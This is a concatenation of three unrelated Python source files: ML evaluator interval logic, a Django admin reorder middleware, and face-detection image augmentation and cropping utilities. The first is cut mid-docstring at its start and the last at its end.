        eval_interval (str | Time | int): How often to evaluate: a :class:`.Time`
            instance, a time string, or an integer number of epochs. ``0`` disables
            evaluation entirely.
        eval_at_fit_end (bool): Also evaluate at :attr:`.Event.FIT_END` if the
            interval did not already trigger on the final batch. Default: True.

    Returns:
        (State, Event) -> bool: A callable suitable for the ``eval_interval``
        argument of an :class:`.Evaluator`.
    """
    # Normalize the interval spec into a Time instance.
    if isinstance(eval_interval, int):
        eval_interval = Time(eval_interval, TimeUnit.EPOCH)
    elif isinstance(eval_interval, str):
        eval_interval = Time.from_timestring(eval_interval)
    if eval_interval.unit not in (TimeUnit.EPOCH, TimeUnit.BATCH):
        raise ValueError("The `eval_interval` must have units of EPOCH or BATCH, or be a function.")
    # Tracks the batch at which we last evaluated, so FIT_END does not
    # re-evaluate when the interval already fired on the final batch.
    last_batch_seen = -1

    def should_eval(state: State, event: Event):
        nonlocal last_batch_seen  # closure state shared across invocations
        if int(eval_interval) <= 0:
            return False
        # Optionally evaluate once more at the end of training, unless the
        # interval already triggered on this very batch.
        if eval_at_fit_end and event == Event.FIT_END and state.timestamp.batch != last_batch_seen:
            return True
        if event == Event.EPOCH_END and eval_interval.unit == TimeUnit.EPOCH and int(
                state.timestamp.epoch) % int(eval_interval) == 0:
            last_batch_seen = state.timestamp.batch
            return True
        if event == Event.BATCH_END and eval_interval.unit == TimeUnit.BATCH and int(
                state.timestamp.batch) % int(eval_interval) == 0:
            last_batch_seen = state.timestamp.batch
            return True
        return False

    return should_eval
class Evaluator:
    """A wrapper for a dataloader to include metrics that apply to a specific dataset.
    For example, :class:`~.nlp_metrics.CrossEntropyLoss` metric for NLP models.
    .. doctest::
    >>> from torchmetrics.classification.accuracy import Accuracy
    >>> eval_evaluator = Evaluator(label="myEvaluator", dataloader=eval_dataloader, metrics=Accuracy())
    >>> trainer = Trainer(
    ...     model=model,
    ...     train_dataloader=train_dataloader,
    ...     eval_dataloader=eval_evaluator,
    ...     optimizers=optimizer,
    ...     max_duration="1ep",
    ... )
    .. testcleanup::
    trainer.engine.close()
    Args:
        label (str): Name of the Evaluator.
        dataloader (DataSpec | Iterable | Dict[str, Any]): Iterable yielding batches,
            a :class:`.DataSpec`, or a dict of :class:`.DataSpec` kwargs.
        metrics (Metric | MetricCollection): :class:`torchmetrics.Metric` to log.
            Deep-copied so every evaluator updates only its own metric state.
        subset_num_batches (int, optional): Maximum number of batches per evaluation.
            ``None`` defers to the trainer's ``eval_subset_num_batches``; ``-1``
            evaluates the entire ``dataloader``.
        eval_interval (int | str | Time | (State, Event) -> bool, optional): How often
            to evaluate. An integer is interpreted as epochs; strings/:class:`.Time`
            instances must have :attr:`.TimeUnit.BATCH` or :attr:`.TimeUnit.EPOCH`
            units; ``0`` disables evaluation; ``None`` defers to the trainer's
            ``eval_interval``. A callable receives (:class:`.State`, :class:`.Event`)
            — the event is :attr:`.Event.BATCH_END` or :attr:`.Event.EPOCH_END` —
            and returns whether to evaluate. When an interval is given, the
            evaluator also runs at ``Event.FIT_END`` if the interval does not
            evenly divide the training duration.
    """
    # The normalized interval predicate; None defers to the Trainer default.
    _eval_interval: Optional[Callable[[State, Event], bool]]

    def __init__(
        self,
        *,
        label: str,
        dataloader: Union[DataSpec, Iterable, Dict[str, Any]],
        metrics: Union[Metric, MetricCollection],
        subset_num_batches: Optional[int] = None,
        eval_interval: Optional[Union[int, str, Time, Callable[[State, Event], bool]]] = None,
    ):
        self.label = label
        self.dataloader = ensure_data_spec(dataloader)
        # Own a private copy of the metrics so parallel evaluators never share
        # state; wrap a bare Metric so results always flow through one path.
        own_metrics = copy.deepcopy(metrics)
        self.metrics = MetricCollection([own_metrics]) if isinstance(own_metrics, Metric) else own_metrics
        self.subset_num_batches = subset_num_batches
        self.eval_interval = eval_interval

    @property
    def eval_interval(self):
        """The interval callable (or ``None``) controlling when this evaluator runs."""
        return self._eval_interval

    @eval_interval.setter
    def eval_interval(self, eval_interval: Optional[Union[int, str, Time, Callable[[State, Event], bool]]]):
        # Callables and None pass straight through; any other spec is turned
        # into a periodic predicate.
        if eval_interval is None or callable(eval_interval):
            self._eval_interval = eval_interval
        else:
            self._eval_interval = evaluate_periodically(eval_interval)
def ensure_evaluator(evaluator: Union[Evaluator, DataSpec, Iterable, Dict[str, Any]],
                     default_metrics: Union[Metric, MetricCollection]):
    """Wrap ``evaluator`` in an :class:`.Evaluator` unless it already is one.

    Args:
        evaluator (Evaluator | DataSpec | Iterable | Dict[str, Any]): An existing
            evaluator, a dataloader, a :class:`.DataSpec` instance, or a dictionary
            of :class:`.DataSpec` kwargs.
        default_metrics (Union[Metric, MetricCollection]): The metrics for the
            ``evaluator``, if a dataloader was specified.

    Returns:
        Evaluator: An evaluator.
    """
    if isinstance(evaluator, Evaluator):
        return evaluator
    return Evaluator(
        label="eval",
        dataloader=evaluator,
        metrics=default_metrics,
    )
|
<gh_stars>0
from copy import deepcopy
from django.conf import settings
from django.contrib import admin
from django.core.exceptions import ImproperlyConfigured
from django.urls import resolve, Resolver404
from django.utils.deprecation import MiddlewareMixin
class ModelAdminReorder(MiddlewareMixin):
    """Middleware that reorders apps and models on the Django admin index and
    app_list pages according to the ``ADMIN_REORDER`` setting.

    Each item of the setting is either an app label (keep that app unchanged)
    or a dict with an ``app`` key and optional ``label``/``models`` keys.
    """
    # Name of the Django settings attribute holding the reorder config.
    settings_variable_name = 'ADMIN_REORDER'
    def init_config(self, request, app_list):
        """Load and validate the reorder config and flatten all admin models
        into ``self.models_list`` keyed by dotted ``model_name``.

        Raises:
            ImproperlyConfigured: if the setting is missing or not tuple/list.
        """
        self.request = request
        self.app_list = app_list
        self.config = getattr(settings, self.settings_variable_name, None)
        if not self.config:
            # ADMIN_REORDER settings is not defined.
            raise ImproperlyConfigured(f'{self.settings_variable_name} config is not defined.')
        if not isinstance(self.config, (tuple, list)):
            raise ImproperlyConfigured(
                '{name} config parameter must be tuple or list. '
                'Got {config}'.format(name=self.settings_variable_name, config=self.config))
        # admin_index = admin.site.index(request)
        admin_site = self.get_admin_site()
        admin_index = admin_site.index(request)
        try:
            # Prefer the full installed-apps list from the admin index view.
            app_list = admin_index.context_data['app_list']
        except KeyError:
            # Fall back to the app_list passed in from the response context.
            pass
        # Flatten all models from apps; each model dict gains a dotted
        # 'model_name' key ("app_label.ObjectName") for later lookup.
        self.models_list = []
        for app in app_list:
            for model in app['models']:
                model['model_name'] = self.get_model_name(
                    app['app_label'], model['object_name'])
                self.models_list.append(model)
    def get_admin_site(self):
        """Return the admin site to reorder; override for a custom site."""
        return admin.site
    def get_app_list(self):
        """Build the reordered app list from ``self.config``."""
        ordered_app_list = []
        for app_config in self.config:
            app = self.make_app(app_config)
            if app:
                ordered_app_list.append(app)
        return ordered_app_list
    def make_app(self, app_config):
        """Turn one config item (app label string or dict) into an app dict."""
        if not isinstance(app_config, (dict, str)):
            raise TypeError('{name} list item must be '
                            'dict or string. Got {config}'.format(
                                name=self.settings_variable_name, config=repr(app_config)
                            ))
        if isinstance(app_config, str):
            # Keep original label and models
            return self.find_app(app_config)
        else:
            return self.process_app(app_config)
    def find_app(self, app_label):
        """Return the original app dict for ``app_label``, or None."""
        for app in self.app_list:
            if app['app_label'] == app_label:
                return app
    def get_model_name(self, app_name, model_name):
        """Return the dotted "app.Model" name (prefixing app if missing)."""
        if '.' not in model_name:
            model_name = '%s.%s' % (app_name, model_name)
        return model_name
    def process_app(self, app_config):
        """Build an app dict from a dict-style config item: optionally rename
        the app ('label') and reorder/rename its models ('models')."""
        if 'app' not in app_config:
            raise NameError('{name} list item must define '
                            'a "app" name. Got {config}'.format(
                                name=self.settings_variable_name,
                                config=repr(app_config)
                            ))
        app = self.find_app(app_config['app'])
        if app:
            # Deep-copy so renames below do not leak into self.app_list.
            app = deepcopy(app)
            # Rename app
            if 'label' in app_config:
                app['name'] = app_config['label']
            # Process app models
            if 'models' in app_config:
                models_config = app_config.get('models')
                models = self.process_models(models_config)
                if models:
                    app['models'] = models
                else:
                    # No configured model could be resolved: drop the app.
                    return None
        return app
    def process_models(self, models_config):
        """Resolve a 'models' config (list of names or dicts) into model dicts,
        preserving the configured order."""
        if not isinstance(models_config, (dict, list, tuple)):
            raise TypeError('"models" config for {name} list '
                            'item must be dict or list/tuple. '
                            'Got {config}'.format(
                                name=self.settings_variable_name,
                                config=repr(models_config)
                            ))
        ordered_models_list = []
        for model_config in models_config:
            model = None
            if isinstance(model_config, dict):
                model = self.process_model(model_config)
            else:
                model = self.find_model(model_config)
            if model:
                ordered_models_list.append(model)
        return ordered_models_list
    def find_model(self, model_name):
        """Return the flattened model dict for dotted ``model_name``, or None."""
        for model in self.models_list:
            if model['model_name'] == model_name:
                return model
    def process_model(self, model_config):
        # Process model defined as { model: 'model', 'label': 'label' }
        # NOTE(review): unlike process_app, this mutates the shared dict from
        # self.models_list in place (no deepcopy), so the relabel affects any
        # other section referencing the same model entry — confirm intent.
        for key in ('model', 'label', ):
            if key not in model_config:
                return
        model = self.find_model(model_config['model'])
        if model:
            model['name'] = model_config['label']
        return model
    def get_admin_site_url_names(self):
        """
        List of admin site url_names where to apply middleware logic
        """
        return ['index', 'app_list']
    def process_template_response(self, request, response):
        """Django middleware hook: reorder the app list in the template
        context of admin index/app_list views; pass other responses through."""
        try:
            url = resolve(request.path_info)
        except Resolver404:
            # Not a resolvable URL; nothing to do.
            return response
        # NOTE(review): `not` binds tighter than `and`, so this bails out only
        # when the view is outside the 'admin' app AND its url_name is not one
        # of the reorder-enabled names; an 'index'/'app_list' view of another
        # app still falls through — confirm this is the intended behavior.
        if not url.app_name == 'admin' and \
                url.url_name not in self.get_admin_site_url_names():
            # current view is not a django admin index
            # or app_list view, bail out!
            return response
        if 'app_list' in response.context_data:
            app_list = response.context_data['app_list']
            context_key = 'app_list'
        elif 'available_apps' in response.context_data:
            app_list = response.context_data['available_apps']
            context_key = 'available_apps'
        else:
            # there is no app_list! nothing to reorder
            return response
        self.init_config(request, app_list)
        ordered_app_list = self.get_app_list()
        response.context_data[context_key] = ordered_app_list
        return response
class ModelAdminReorderMiddlewareMixin(ModelAdminReorder):
    """
    If you have multiple admin sites, you can:
    1) define your own middleware class inheriting from ModelAdminReorderMiddlewareMixin
    2) set the settings_variable_name attribute
    3) override the get_admin_site() method to return another admin site
    4) override the get_admin_site_url_names() method, appending your custom url names
    """
    # Example overrides:
    # def get_admin_site(self):
    #     return short_admin_site
    # def get_admin_site_url_names(self):
    #     names = super().get_admin_site_url_names()
    #     names.append('short_admin_index')
    #     return names
|
from __future__ import print_function
import numpy as np
import cv2
import os
import math
import sys
import random
from utils.config import config
def brightness_aug(src, x):
    """Randomly scale pixel intensities in-place.

    A factor is drawn uniformly from ``[1 - x, 1 + x]`` and multiplied into
    ``src``. The array is modified in-place and also returned.
    """
    factor = 1.0 + random.uniform(-x, x)
    src *= factor
    return src
def contrast_aug(src, x):
    """Randomly adjust contrast in-place.

    With ``alpha`` drawn uniformly from ``[1 - x, 1 + x]``, blends the image
    toward its mean luma: ``src = alpha * src + (1 - alpha) * mean_luma``.
    NOTE(review): the luma weights are in R,G,B order while images elsewhere
    in this file are BGR — confirm this channel order is intended.
    """
    alpha = 1.0 + random.uniform(-x, x)
    luma_weights = np.array([[[0.299, 0.587, 0.114]]])
    weighted = src * luma_weights
    # (3 / size) * sum == mean per-pixel luma; scaled by (1 - alpha).
    gray_offset = (3.0 * (1.0 - alpha) / weighted.size) * np.sum(weighted)
    src *= alpha
    src += gray_offset
    return src
def saturation_aug(src, x):
    """Randomly adjust saturation in-place.

    With ``alpha`` drawn uniformly from ``[1 - x, 1 + x]``, blends every pixel
    toward its own luma value: ``src = alpha * src + (1 - alpha) * gray``.
    NOTE(review): the luma weights are in R,G,B order while images elsewhere
    in this file are BGR — confirm this channel order is intended.
    """
    alpha = 1.0 + random.uniform(-x, x)
    luma_weights = np.array([[[0.299, 0.587, 0.114]]])
    per_pixel_gray = np.sum(src * luma_weights, axis=2, keepdims=True)
    per_pixel_gray *= (1.0 - alpha)
    src *= alpha
    src += per_pixel_gray
    return src
def color_aug(img, x):
    """Apply brightness, contrast and saturation jitter of strength ``x``,
    in a random order. The augmentations operate in-place on ``img``."""
    ops = [brightness_aug, contrast_aug, saturation_aug]
    random.shuffle(ops)
    for op in ops:
        img = op(img, x)
    return img
def get_image(roidb, scale=False):
    """
    Load, optionally flip/rescale and tensorize each image of a roidb.
    :param roidb: a list of roidb dicts ('image' or 'stream', 'flipped', 'boxes', optional 'boxes_mask')
    :param scale: if True, draw a random scale from config.TRAIN.SCALE_RANGE instead of config.SCALES
    :return: (list of 1x3xHxW img tensors in mxnet format, list of copied roidb dicts)
    each returned roidb gains item['im_info'] = [height, width, im_scale]
    0 --- x (width, second dim of im)
    |
    y (height, first dim of im)
    """
    num_images = len(roidb)
    processed_ims = []
    processed_roidb = []
    for i in range(num_images):
        roi_rec = roidb[i]
        # Decode from an in-memory stream if present, else read from disk.
        if 'stream' in roi_rec:
            im = cv2.imdecode(roi_rec['stream'], cv2.IMREAD_COLOR)
        else:
            assert os.path.exists(roi_rec['image']), '{} does not exist'.format(roi_rec['image'])
            im = cv2.imread(roi_rec['image'])
        if roidb[i]['flipped']:
            # Horizontal flip (width axis).
            im = im[:, ::-1, :]
        new_rec = roi_rec.copy()
        if scale:
            # Random isotropic scale drawn from the configured range.
            scale_range = config.TRAIN.SCALE_RANGE
            im_scale = np.random.uniform(scale_range[0], scale_range[1])
            im = cv2.resize(im, None, None, fx=im_scale, fy=im_scale, interpolation=cv2.INTER_LINEAR)
        elif not config.ORIGIN_SCALE:
            # Pick one of the configured (target, max) scale pairs.
            scale_ind = random.randrange(len(config.SCALES))
            target_size = config.SCALES[scale_ind][0]
            max_size = config.SCALES[scale_ind][1]
            im, im_scale = resize(im, target_size, max_size, stride=config.IMAGE_STRIDE)
        else:
            im_scale = 1.0
        im_tensor = transform(im, config.PIXEL_MEANS)
        if 'boxes_mask' in roi_rec:
            im = im.astype(np.float32)
            # Zero out ignored regions directly in the tensor (boxes scaled to
            # the resized image). NOTE: np.int is removed in NumPy>=1.24 —
            # confirm the pinned numpy version.
            boxes_mask = roi_rec['boxes_mask'].copy() * im_scale
            boxes_mask = boxes_mask.astype(np.int)
            for j in range(boxes_mask.shape[0]):
                m = boxes_mask[j]
                im_tensor[:,:,m[1]:m[3],m[0]:m[2]] = 0.0
                #print('find mask', m, file=sys.stderr)
        # NOTE(review): the tensor is appended BEFORE the IMAGE_ALIGN padding
        # below, so the stored tensor is unpadded while im_info reports the
        # padded shape — confirm whether the append should come after padding.
        processed_ims.append(im_tensor)
        new_rec['boxes'] = roi_rec['boxes'].copy() * im_scale
        if config.TRAIN.IMAGE_ALIGN>0:
            # Pad H/W up to the next multiple of IMAGE_ALIGN with zeros.
            if im_tensor.shape[2]%config.TRAIN.IMAGE_ALIGN!=0 or im_tensor.shape[3]%config.TRAIN.IMAGE_ALIGN!=0:
                new_height = math.ceil(float(im_tensor.shape[2])/config.TRAIN.IMAGE_ALIGN)*config.TRAIN.IMAGE_ALIGN
                new_width = math.ceil(float(im_tensor.shape[3])/config.TRAIN.IMAGE_ALIGN)*config.TRAIN.IMAGE_ALIGN
                new_im_tensor = np.zeros((1, 3, int(new_height), int(new_width)))
                new_im_tensor[:,:,0:im_tensor.shape[2],0:im_tensor.shape[3]] = im_tensor
                print(im_tensor.shape, new_im_tensor.shape, file=sys.stderr)
                im_tensor = new_im_tensor
        #print('boxes', new_rec['boxes'], file=sys.stderr)
        im_info = [im_tensor.shape[2], im_tensor.shape[3], im_scale]
        new_rec['im_info'] = im_info
        processed_roidb.append(new_rec)
    return processed_ims, processed_roidb
TMP_ID = 0  # module-global counter naming debug crop dumps ('./tmp/D<N>.png'); only the first 10 are written
# backup method (superseded by get_crop_image below; kept for reference)
def __get_crop_image(roidb):
    """
    Crop a SIZE x SIZE training patch around one randomly chosen gt box.
    :param roidb: a list of roidb dicts
    :return: (list of 1x3xHxW img tensors in mxnet format, list of copied roidb dicts)
    each returned roidb gains item['im_info'] = [height, width, im_scale]
    0 --- x (width, second dim of im)
    |
    y (height, first dim of im)
    """
    #roidb and each roi_rec can not be changed as it will be reused in next epoch
    num_images = len(roidb)
    processed_ims = []
    processed_roidb = []
    for i in range(num_images):
        roi_rec = roidb[i]
        if 'stream' in roi_rec:
            im = cv2.imdecode(roi_rec['stream'], cv2.IMREAD_COLOR)
        else:
            assert os.path.exists(roi_rec['image']), '{} does not exist'.format(roi_rec['image'])
            im = cv2.imread(roi_rec['image'])
        if roidb[i]['flipped']:
            im = im[:, ::-1, :]
        if 'boxes_mask' in roi_rec:
            #im = im.astype(np.float32)
            # Black out ignored regions in the raw image.
            boxes_mask = roi_rec['boxes_mask'].copy()
            boxes_mask = boxes_mask.astype(np.int)
            for j in range(boxes_mask.shape[0]):
                m = boxes_mask[j]
                im[m[1]:m[3],m[0]:m[2],:] = 0
                #print('find mask', m, file=sys.stderr)
        new_rec = roi_rec.copy()
        #choose one gt randomly
        SIZE = config.SCALES[0][0]
        TARGET_BOX_SCALES = np.array([16,32,64,128,256,512])
        assert roi_rec['boxes'].shape[0]>0
        # Candidate boxes: those at least MIN_BOX_SIZE on their longer side.
        # NOTE(review): this loop reuses `i`, shadowing the outer image index.
        candidates = []
        for i in range(roi_rec['boxes'].shape[0]):
            box = roi_rec['boxes'][i]
            box_size = max(box[2]-box[0], box[3]-box[1])
            if box_size<config.TRAIN.MIN_BOX_SIZE:
                continue
            #if box[0]<0 or box[1]<0:
            #    continue
            #if box[2]>im.shape[1] or box[3]>im.shape[0]:
            #    continue;
            candidates.append(i)
        assert len(candidates)>0
        # Scale the image so the chosen box lands near one of the target sizes
        # (randomly picking a size up to one step above the nearest).
        box_ind = random.choice(candidates)
        box = roi_rec['boxes'][box_ind]
        box_size = max(box[2]-box[0], box[3]-box[1])
        dist = np.abs(TARGET_BOX_SCALES - box_size)
        nearest = np.argmin(dist)
        target_ind = random.randrange(min(len(TARGET_BOX_SCALES), nearest+2))
        target_box_size = TARGET_BOX_SCALES[target_ind]
        im_scale = float(target_box_size) / box_size
        #min_scale = float(SIZE)/np.min(im.shape[0:2])
        #if im_scale<min_scale:
        #    im_scale = min_scale
        im = cv2.resize(im, None, None, fx=im_scale, fy=im_scale, interpolation=cv2.INTER_LINEAR)
        new_rec['boxes'] = roi_rec['boxes'].copy()*im_scale
        # Random SIZE x SIZE window whose upper-left corner keeps the chosen
        # box inside the crop.
        box_scale = new_rec['boxes'][box_ind].copy().astype(np.int)
        ul_min = box_scale[2:4] - SIZE
        ul_max = box_scale[0:2]
        assert ul_min[0]<=ul_max[0]
        assert ul_min[1]<=ul_max[1]
        #print('ul', ul_min, ul_max, box)
        up, left = np.random.randint(ul_min[1], ul_max[1]+1), np.random.randint(ul_min[0], ul_max[0]+1)
        #print('box', box, up, left)
        # Translate-and-crop via warpAffine, padding out-of-image area with
        # the configured pixel means.
        M = [ [1.0, 0.0, -left],
              [0.0, 1.0, -up], ]
        M = np.array(M)
        im = cv2.warpAffine(im, M, (SIZE, SIZE), borderValue = tuple(config.PIXEL_MEANS))
        #tbox = np.array([left, left+SIZE, up, up+SIZE], dtype=np.int)
        #im_new = np.zeros( (SIZE, SIZE,3), dtype=im.dtype)
        #for i in range(3):
        #    im_new[:,:,i] = config.PIXEL_MEANS[i]
        new_rec['boxes'][:,0] -= left
        new_rec['boxes'][:,2] -= left
        new_rec['boxes'][:,1] -= up
        new_rec['boxes'][:,3] -= up
        box_trans = new_rec['boxes'][box_ind].copy().astype(np.int)
        #print('sel box', im_scale, box, box_scale, box_trans, file=sys.stderr)
        #print('before', new_rec['boxes'].shape[0])
        # Keep only boxes that remain inside the crop and are large enough.
        boxes_new = []
        classes_new = []
        for i in range(new_rec['boxes'].shape[0]):
            box = new_rec['boxes'][i]
            box_size = max(box[2]-box[0], box[3]-box[1])
            # NOTE(review): [x1,y1]+[x2,y2] is list concatenation, so this is
            # the half-coordinates vector, not the box center; the test below
            # only uses indices 0/1 (x1/2, y1/2) — confirm intent.
            center = np.array(([box[0], box[1]]+[box[2], box[3]]))/2
            if center[0]<0 or center[1]<0 or center[0]>=im.shape[1] or center[1]>=im.shape[0]:
                continue
            if box_size<config.TRAIN.MIN_BOX_SIZE:
                continue
            boxes_new.append(box)
            classes_new.append(new_rec['gt_classes'][i])
        new_rec['boxes'] = np.array(boxes_new)
        new_rec['gt_classes'] = np.array(classes_new)
        #print('after', new_rec['boxes'].shape[0])
        #assert new_rec['boxes'].shape[0]>0
        DEBUG = True
        if DEBUG:
            # Dump the first few annotated crops for visual inspection.
            global TMP_ID
            if TMP_ID<10:
                tim = im.copy()
                for i in range(new_rec['boxes'].shape[0]):
                    box = new_rec['boxes'][i].copy().astype(np.int)
                    cv2.rectangle(tim, (box[0], box[1]), (box[2], box[3]), (255, 0, 0), 1)
                filename = './tmp/D%d.png' % TMP_ID
                TMP_ID+=1
                cv2.imwrite(filename, tim)
        im_tensor = transform(im, config.PIXEL_MEANS)
        processed_ims.append(im_tensor)
        #print('boxes', new_rec['boxes'], file=sys.stderr)
        im_info = [im_tensor.shape[2], im_tensor.shape[3], im_scale]
        new_rec['im_info'] = im_info
        processed_roidb.append(new_rec)
    return processed_ims, processed_roidb
def get_crop_image(roidb):
    """
    Randomly rescale each image and crop a SIZE x SIZE patch containing at
    least one valid box (retrying up to LIMIT window positions), adjusting
    boxes and 5-point landmarks accordingly.
    :param roidb: a list of roidb dicts
    :return: (list of 1x3xHxW img tensors in mxnet format, list of copied roidb dicts)
    each returned roidb gains item['im_info'] = [height, width, im_scale]
    0 --- x (width, second dim of im)
    |
    y (height, first dim of im)
    """
    #roidb and each roi_rec can not be changed as it will be reused in next epoch
    num_images = len(roidb)
    processed_ims = []
    processed_roidb = []
    for i in range(num_images):
        roi_rec = roidb[i]
        if 'stream' in roi_rec:
            im = cv2.imdecode(roi_rec['stream'], cv2.IMREAD_COLOR)
        else:
            assert os.path.exists(roi_rec['image']), '{} does not exist'.format(roi_rec['image'])
            im = cv2.imread(roi_rec['image'])
        if roidb[i]['flipped']:
            im = im[:, ::-1, :]
        if 'boxes_mask' in roi_rec:
            #im = im.astype(np.float32)
            # Black out ignored regions in the raw image.
            boxes_mask = roi_rec['boxes_mask'].copy()
            boxes_mask = boxes_mask.astype(np.int)
            for j in range(boxes_mask.shape[0]):
                m = boxes_mask[j]
                im[m[1]:m[3],m[0]:m[2],:] = 0
                #print('find mask', m, file=sys.stderr)
        # Rescale so that a random fraction (PRE_SCALES) of the short side
        # maps onto the crop size SIZE.
        SIZE = config.SCALES[0][0]
        _scale = random.choice(config.PRE_SCALES)
        size = int(np.round(_scale*np.min(im.shape[0:2])))
        im_scale = float(SIZE)/size
        origin_shape = im.shape
        if _scale>10.0: #avoid im.size<SIZE, never?
            sizex = int(np.round(im.shape[1]*im_scale))
            sizey = int(np.round(im.shape[0]*im_scale))
            if sizex<SIZE:
                sizex = SIZE
                print('keepx', sizex)
            if sizey<SIZE:
                sizey = SIZE
                # NOTE(review): prints sizex under the 'keepy' label —
                # presumably sizey was meant.
                print('keepy', sizex)
            im = cv2.resize(im, (sizex, sizey), interpolation=cv2.INTER_LINEAR)
        else:
            im = cv2.resize(im, None, None, fx=im_scale, fy=im_scale, interpolation=cv2.INTER_LINEAR)
        assert im.shape[0]>=SIZE and im.shape[1]>=SIZE
        new_rec = roi_rec.copy()
        new_rec['boxes'] = roi_rec['boxes'].copy() * im_scale
        new_rec['points'] = roi_rec['points'].copy() * im_scale
        # Retry random crop windows until one keeps at least one valid box
        # (or give up on the last attempt, keeping whatever survives).
        retry = 0
        LIMIT = 25
        size = SIZE
        while retry<LIMIT:
            up, left = (np.random.randint(0, im.shape[0]-size+1), np.random.randint(0, im.shape[1]-size+1))
            boxes_new = new_rec['boxes'].copy()
            points_new = new_rec['points'].copy()
            points_ind_new = new_rec['points_ind'].copy()
            im_new = im[up:(up+size), left:(left+size), :]
            #print('crop', up, left, size, im_scale)
            # Shift boxes into crop coordinates.
            boxes_new[:,0] -= left
            boxes_new[:,2] -= left
            boxes_new[:,1] -= up
            boxes_new[:,3] -= up
            # Shift the 5 (x, y) landmark pairs for entries that have them.
            points_ind = np.where(points_ind_new==1)[0]
            if (len(points_ind)>0):
                points_new[points_ind, 0] -= left
                points_new[points_ind, 2] -= left
                points_new[points_ind, 4] -= left
                points_new[points_ind, 6] -= left
                points_new[points_ind, 8] -= left
                points_new[points_ind, 1] -= up
                points_new[points_ind, 3] -= up
                points_new[points_ind, 5] -= up
                points_new[points_ind, 7] -= up
                points_new[points_ind, 9] -= up
            #im_new = cv2.resize(im_new, (SIZE, SIZE), interpolation=cv2.INTER_LINEAR)
            #boxes_new *= im_scale
            #print(origin_shape, im_new.shape, im_scale)
            # Keep boxes that remain inside the crop and are large enough.
            valid = []
            valid_boxes = []
            valid_points = []
            valid_points_ind = []
            for i in range(boxes_new.shape[0]):
                box = boxes_new[i]
                # NOTE(review): [x1,y1]+[x2,y2] is list concatenation, so this
                # is the half-coordinates vector, not the box center; the test
                # below only uses indices 0/1 (x1/2, y1/2) — confirm intent.
                center = np.array(([box[0], box[1]]+[box[2], box[3]]))/2
                #box[0] = max(0, box[0])
                #box[1] = max(0, box[1])
                #box[2] = min(im_new.shape[1], box[2])
                #box[3] = min(im_new.shape[0], box[3])
                box_size = max(box[2]-box[0], box[3]-box[1])
                if center[0] < 0 or center[1] < 0 or center[0] >= im_new.shape[1] or center[1] >= im_new.shape[0]:
                    continue
                if box_size < config.TRAIN.MIN_BOX_SIZE:
                    continue
                valid.append(i)
                valid_boxes.append(box)
                valid_points.append(points_new[i])
                valid_points_ind.append(points_ind_new[i])
            if len(valid) > 0 or retry == LIMIT-1:
                im = im_new
                new_rec['boxes'] = np.array(valid_boxes)
                new_rec['gt_classes'] = new_rec['gt_classes'][valid]
                new_rec['points'] = np.array(valid_points)
                new_rec['points_ind'] = np.array(valid_points_ind)
                break
            retry+=1
        if config.COLOR_JITTERING>0.0:
            im = im.astype(np.float32)
            im = color_aug(im, config.COLOR_JITTERING)
        DEBUG = True #TODO debug
        if DEBUG:
            # Dump the first few annotated crops for visual inspection.
            global TMP_ID
            if TMP_ID < 10:
                tim = im.copy().astype(np.uint8)
                for i in range(new_rec['boxes'].shape[0]):
                    box = new_rec['boxes'][i].copy().astype(np.int)
                    cv2.rectangle(tim, (box[0], box[1]), (box[2], box[3]), (255, 0, 0), 1)
                    points_ind_ = new_rec['points_ind'][i].copy().astype(np.int)
                    if points_ind_:
                        points_ = new_rec['points'][i].copy().astype(np.int)
                        for j in range(5):
                            cv2.circle(tim, (points_[2*j], points_[2*j+1]), 3, [255, 0, 0])
                filename = './tmp/D%d.png' % TMP_ID
                print(roi_rec['image'])
                print('write', filename)
                TMP_ID +=1
                cv2.imwrite(filename, tim)
        im_tensor = transform(im, config.PIXEL_MEANS)
        processed_ims.append(im_tensor)
        #print('boxes', new_rec['boxes'], file=sys.stderr)
        im_info = [im_tensor.shape[2], im_tensor.shape[3], im_scale]
        new_rec['im_info'] = im_info
        processed_roidb.append(new_rec)
    return processed_ims, processed_roidb
def resize(im, target_size, max_size, stride=0, min_size=0):
    """
    Resize an image so its short side matches target_size, returning the scale.
    :param im: BGR image input by opencv
    :param target_size: one dimensional size (the short side)
    :param max_size: one dimensional max size (the long side)
    :param stride: if given, pad the resized image with zeros to a multiple of stride
    :param min_size: if given, enforce a lower bound on the scaled short side
    :return: (resized image [optionally padded], scale factor)
    """
    short_side = np.min(im.shape[0:2])
    long_side = np.max(im.shape[0:2])
    scale = float(target_size) / float(short_side)
    # Prevent the long side from exceeding max_size.
    if np.round(scale * long_side) > max_size:
        scale = float(max_size) / float(long_side)
    # Optionally keep the short side from dropping below min_size.
    if min_size > 0 and np.round(scale * short_side) < min_size:
        scale = float(min_size) / float(short_side)
    resized = cv2.resize(im, None, None, fx=scale, fy=scale, interpolation=cv2.INTER_LINEAR)
    if stride == 0:
        return resized, scale
    # Pad height and width up to the next multiple of stride with zeros.
    padded_h = int(np.ceil(resized.shape[0] / float(stride)) * stride)
    padded_w = int(np.ceil(resized.shape[1] / float(stride)) * stride)
    padded_im = np.zeros((padded_h, padded_w, resized.shape[2]))
    padded_im[:resized.shape[0], :resized.shape[1], :] = resized
    return padded_im, scale
def transform(im, pixel_means):
    """
    Convert an HxWx3 BGR image into a 1x3xHxW float tensor with channels
    reversed to RGB order and per-channel means subtracted.
    :param im: [height, width, channel] in BGR
    :param pixel_means: [B, G, R pixel means]
    :return: [batch, channel, height, width]
    """
    height, width = im.shape[0], im.shape[1]
    im_tensor = np.zeros((1, 3, height, width))
    for channel in range(3):
        # Channel 0 of the tensor is R (input channel 2), etc.
        im_tensor[0, channel] = im[:, :, 2 - channel] - pixel_means[2 - channel]
    return im_tensor
def transform_inverse(im_tensor, pixel_means):
    """
    Convert a 1x3xHxW tensor (as produced by ``transform``) back to an
    ordinary HxWx3 uint8 RGB image by re-adding the per-channel means.
    :param im_tensor: [batch, channel, height, width]; batch must be 1
    :param pixel_means: [B, G, R pixel means] (numpy array)
    :return: im [height, width, channel(RGB)]
    """
    assert im_tensor.shape[0] == 1
    # Move channels last on a private copy, then take the single image.
    hwc = im_tensor.copy().transpose((0, 2, 3, 1))[0]
    assert hwc.shape[2] == 3
    # Means are stored B,G,R; the tensor channels are R,G,B.
    hwc += pixel_means[[2, 1, 0]]
    return hwc.astype(np.uint8)
def tensor_vstack(tensor_list, pad=0):
    """
    Vertically stack tensors, padding trailing dimensions to the max shape.
    :param tensor_list: list of tensors to be stacked along the first axis
    :param pad: fill value for positions not covered by any tensor
    :return: tensor whose first dim is the sum of input first dims and whose
